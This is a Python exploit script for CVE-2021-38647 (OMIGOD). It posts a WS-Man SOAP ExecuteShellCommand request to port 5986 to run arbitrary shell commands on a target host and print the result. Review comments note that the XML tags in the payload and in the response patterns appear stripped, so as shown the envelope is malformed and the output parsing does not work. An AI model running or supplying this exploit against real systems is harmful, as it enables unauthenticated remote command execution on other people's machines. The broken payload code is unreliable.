#!/usr/bin/python3
import argparse
import re
from xml.etree import ElementTree
from xml.sax.saxutils import escape

import requests
import urllib3
# exploit() below posts with verify=False (presumably because the target
# presents a self-signed certificate -- confirm); silence the
# InsecureRequestWarning that every such request would otherwise emit.
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
# SOAP payload from https://github.com/midoxnet/CVE-2021-38647
# NOTE(review): the XML element tags appear to have been stripped when this
# listing was rendered -- only the text content of the envelope survives, so
# as written the body is not well-formed XML. Restore the full WS-Man SOAP
# envelope from the linked source before relying on this.
# The single "{}" placeholder is filled with the shell command by
# DATA.format(command) in exploit(). The http://192.168.1.1:5986/wsman/
# address on the first line is hard-coded and is NOT substituted with
# --target; only the HTTPS request URL built in exploit() uses the target.
DATA: str = """
HTTP://192.168.1.1:5986/wsman/
http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem/ExecuteShellCommand
102400
uuid:0AB58087-C2C3-0005-0000-000000010000
PT1M30S
root/scx
{}
0
"""
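def exploit(target, command, *, timeout=30):
    """Send one ExecuteShellCommand request to the target's port 5986 and print the result.

    Args:
        target: IP address or hostname of the target (port 5986 is hard-coded).
        command: shell command to run on the target. It is placed into the
            SOAP body via DATA.format(), so it is XML-escaped here and must be
            non-empty.
        timeout: seconds to wait for connect/response (requests semantics);
            without it a silently dropped connection hangs the script forever.

    Raises:
        ValueError: if ``command`` is empty or None (argparse leaves ``-c``
            optional, which would otherwise send the literal string "None").
        requests.RequestException: on connection failure or timeout.

    TLS verification is deliberately disabled (verify=False); only use this
    against hosts you are authorised to test.
    """
    if not command:
        raise ValueError('command must be a non-empty string')
    headers = {'Content-Type': 'application/soap+xml;charset=UTF-8'}
    # The command lands inside XML text content: escape &, < and > so common
    # shell syntax ("&&", "2>&1", redirections) does not make the envelope
    # malformed. An XML parser on the receiving side decodes it back.
    body = DATA.format(escape(command))
    # Only the request URL uses --target; the address embedded in DATA stays
    # hard-coded.
    r = requests.post(f'https://{target}:5986/wsman', headers=headers,
                      data=body, verify=False, timeout=timeout)
    # NOTE(review): the element names in these two patterns appear to have
    # been stripped when the listing was rendered; as written both match the
    # first line of the response rather than separate stdout/stderr fields.
    # Restore the tag names from the upstream source before use.
    output = re.search('(.*)', r.text)
    error = re.search('(.*)', r.text)
    # Trailing newline is dropped so print() does not double-space the output.
    if output and output.group(1):
        print(output.group(1).rstrip('\n'))
    if error and error.group(1):
        print(error.group(1).rstrip('\n'))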
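if __name__ == '__main__':
    parser = argparse.ArgumentParser(
        description='Run a shell command on a host affected by CVE-2021-38647 '
                    'and print the response.')
    parser.add_argument('-t', '--target', help='The IP address of the target', required=True)
    # Without required=True argparse leaves this None and the SOAP payload
    # would carry the literal string "None" as the command.
    parser.add_argument('-c', '--command', help='The command to run', required=True)
    args = parser.parse_args()
    exploit(args.target, args.command)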